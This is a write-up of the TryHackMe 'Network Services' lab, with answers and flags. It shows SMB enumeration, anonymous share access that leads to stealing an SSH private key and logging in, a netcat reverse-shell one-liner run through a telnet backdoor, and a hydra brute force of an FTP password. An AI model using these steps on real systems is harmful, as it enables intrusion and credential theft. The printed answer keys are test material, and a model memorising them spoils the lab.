# Network Services
Link: https://tryhackme.com/room/networkservices
IP: 10.10.7.60


## Task 2 Enumerating SMB



What does SMB stand for?  `Server Message Block`

What type of protocol is SMB?    `response-request`

What do clients connect to servers using?    `TCP-IP`

What systems does Samba run on? `Unix`

## Task 3 - Enumerating SMB

Scanning Ports using nmap

```
nmap -sV -sC 10.10.7.60
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-18 22:19 EDT
Nmap scan report for 10.10.7.60
Host is up (0.14s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 91:df:5c:7c:26:22:6e:90:23:a7:7d:fa:5c:e1:c2:52 (RSA)
|   256 86:57:f5:2a:f7:86:9c:cf:02:c1:ac:bc:34:90:6b:01 (ECDSA)
|_  256 81:e3:cc:e7:c9:3c:75:d7:fb:e0:86:a0:01:41:77:81 (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: POLOSMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1s, deviation: 1s, median: 1s
|_nbstat: NetBIOS name: POLOSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: polosmb
|   NetBIOS computer name: POLOSMB\x00
|   Domain name: \x00
|   FQDN: polosmb
|_  System time: 2021-04-19T02:19:50+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-19T02:19:49
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.86 seconds


```

Conduct an nmap scan of your choosing, How many ports are open? `3`

What ports is SMB running on? `139/445`

Let's get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name? 

- Run `enum4linux -A 10.10.7.60`

```

 ================================================== 
|    Enumerating Workgroup/Domain on 10.10.7.60    |
 ================================================== 
[+] Got domain/workgroup name: WORKGROUP


```
Answer: `workgroup`


What comes up as the name of the machine?

```
[+] Got OS info for 10.10.7.60 from srvinfo:
	POLOSMB        Wk Sv PrQ Unx NT SNT polosmb server (Samba, Ubuntu)


```
Answer: `POLOSMB`

What operating system version is running?    

```
platform_id     :	500
	os version      :	6.1

```


What share sticks out as something we might want to investigate?    

```
	Sharename       Type      Comment
	---------       ----      -------
	netlogon        Disk      Network Logon Service
	profiles        Disk      Users profiles
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (polosmb server (Samba, Ubuntu))


```
Answer: `profiles`

## Task 4 - Exploiting SMB
 What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port?

`smbclient //10.10.10.2/secret -U suit`


Lets see if our interesting share has been configured to allow anonymous access, I.E it doesn't require authentication to view the files. We can do this easily by:

- using the username "Anonymous"

- connecting to the share we found during the enumeration stage

- and not supplying a password.

Does the share allow anonymous access? Y/N?

```
smbclient //10.10.7.60/profiles -U anonymous
Enter WORKGROUP\anonymous's password: 
Try "help" to get a list of possible commands.
smb: \> help



```
Answer: `Y`

Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?\


`ls`

```
smb: \> ls
  .                                   D        0  Tue Apr 21 07:08:23 2020
  ..                                  D        0  Tue Apr 21 06:49:56 2020
  .cache                             DH        0  Tue Apr 21 07:08:23 2020
  .profile                            H      807  Tue Apr 21 07:08:23 2020
  .sudo_as_admin_successful           H        0  Tue Apr 21 07:08:23 2020
  .bash_logout                        H      220  Tue Apr 21 07:08:23 2020
  .viminfo                            H      947  Tue Apr 21 07:08:23 2020
  Working From Home Information.txt      N      358  Tue Apr 21 07:08:23 2020
  .ssh                               DH        0  Tue Apr 21 07:08:23 2020
  .bashrc                             H     3771  Tue Apr 21 07:08:23 2020
  .gnupg                             DH        0  Tue Apr 21 07:08:23 2020

```


`more "Working From Home Information.txt`

```
John Cactus,

As you're well aware, due to the current pandemic most of POLO inc. has insisted that, wherever 
possible, employees should work from home. As such- your account has now been enabled with ssh
access to the main server.

If there are any problems, please contact the IT department at it@polointernalcoms.uk

Regards,

James
Department Manager 


```
answer: `John Cactus`

What service has been configured to allow him to work from home?

`ssh`

Okay! Now we know this, what directory on the share should we look in?

`.ssh`

This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
`id_rsa`


Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".

```
smb: \.ssh\> get id_rsa
getting file \.ssh\id_rsa of size 1679 as id_rsa (3.6 KiloBytes/sec) (average 3.6 KiloBytes/sec)

```
In local machine, run `chmod 600 id_rsa`



Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.

What is the smb.txt flag?

```
root@kali-virtualbox:~/GitLab/Offensive-Security/TryHackMe/NetworkServices# ssh -i id_rsa cactus@10.10.111.96
The authenticity of host '10.10.111.96 (10.10.111.96)' can't be established.
ECDSA key fingerprint is SHA256:RZt+npRH1P+pLVe+/9mqAkepvpb20f+TzqgPAhYhHss.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.111.96' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed May  5 19:38:27 UTC 2021

  System load:  0.0                Processes:           93
  Usage of /:   33.3% of 11.75GB   Users logged in:     0
  Memory usage: 17%                IP address for eth0: 10.10.111.96
  Swap usage:   0%


22 packages can be updated.
0 updates are security updates.


Last login: Tue Apr 21 11:19:15 2020 from 192.168.1.110
cactus@polosmb:~$ ls
smb.txt
cactus@polosmb:~$ cat smb.txt 
THM{smb_is_fun_eh?}
cactus@polosmb:~$ 

```

# Task 7 Exploiting Telnet

0) Init telnet session
```
root@kali-virtualbox:~/GitLab/Offensive-Security/TryHackMe/NetworkServices# telnet 10.10.5.3 8012
Trying 10.10.5.3...
Connected to 10.10.5.3.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands

```
Set up the netcat listener on port 4444, run the mfvenom payload and paste it into the telnet session

1) Run 
`sudo tcpdump ip proto \\icmp -i tun0`

2)in another terminal, run 

`nc -lvp 4444`

3)In the Telnet session, run

`.RUN mkfifo /tmp/amvbfjs; nc 10.6.31.49 4444 0</tmp/amvbfjs | /bin/sh >/tmp/amvbfjs 2>&1; rm /tmp/amvbfjs`

4) Check the nc listener
```
root@kali-virtualbox:~/Downloads# nc -lvp 4444
listening on [any] 4444 ...
10.10.5.3: inverse host lookup failed: Unknown host
connect to [10.6.31.49] from (UNKNOWN) [10.10.5.3] 39762
```

5) Results

```
connect to [10.6.31.49] from (UNKNOWN) [10.10.5.3] 39762
pwd
/root
ls
flag.txt
cat flag  
cat: flag: No such file or directory
cat flag.txt
THM{y0u_g0t_th3_t3ln3t_fl4g}



```

# Task 8 - FTP 

```
oot@kali-virtualbox:~/GitLab/Offensive-Security/TryHackMe/NetworkServices# ftp 10.10.66.146
Connected to 10.10.66.146.
220 Welcome to the administrator FTP service.
Name (10.10.66.146:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             353 Apr 24  2020 PUBLIC_NOTICE.txt
226 Directory send OK.
ftp> 

```


```
root@kali-virtualbox:~/GitLab/Offensive-Security/TryHackMe/NetworkServices# cat PUBLIC_NOTICE.txt 
===================================
MESSAGE FROM SYSTEM ADMINISTRATORS
===================================

Hello,

I hope everyone is aware that the
FTP server will not be available 
over the weekend- we will be 
carrying out routine system 
maintenance. Backups will be
made to my account so I reccomend
encrypting any sensitive data.

Cheers,

Mike 


```


Bruteforce
1) Run

`hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.66.146 ftpordlists/rockyou.txt -vV 10.10.66.146 ftp
`


```
[21][ftp] host: 10.10.66.146   login: mike   password: password

```

login as mike

```
root@kali-virtualbox:~/GitLab/Offensive-Security/TryHackMe/NetworkServices# ftp 10.10.66.146
Connected to 10.10.66.146.
220 Welcome to the administrator FTP service.
Name (10.10.66.146:root): mike
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Apr 24  2020 ftp
-rwxrwxrwx    1 0        0              26 Apr 24  2020 ftp.txt
226 Directory send OK.
ftp> open ftp.txt
Already connected to 10.10.66.146, use close first.
ftp> get ftp.txt
local: ftp.txt remote: ftp.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ftp.txt (26 bytes).
226 Transfer complete.
26 bytes received in 0.00 secs (846.3542 kB/s)
ftp> 
```

```
cat ftp.txt 
THM{y0u_g0t_th3_ftp_fl4g}

```